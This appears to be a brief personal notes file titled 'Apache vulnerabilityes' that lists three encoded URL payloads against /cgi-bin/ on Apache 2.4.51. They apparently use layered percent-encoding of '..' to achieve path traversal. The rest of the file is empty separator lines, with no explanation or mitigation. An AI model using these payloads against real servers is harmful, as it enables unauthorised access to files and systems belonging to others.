###############################################################################
########################### Apache vulnerabilityes ############################
###############################################################################

Apache 2.4.51 - http://<host>/cgi-bin/.%2e/
Apache 2.4.51 - http://<host>/cgi-bin/.%%32%65/
Apache 2.4.51 - http://<host>/cgi-bin/.%%%25%33%32%25%36%35/

###############################################################################
###############################################################################
###############################################################################


###############################################################################
###############################################################################
###############################################################################


###############################################################################
###############################################################################
###############################################################################


###############################################################################
###############################################################################
###############################################################################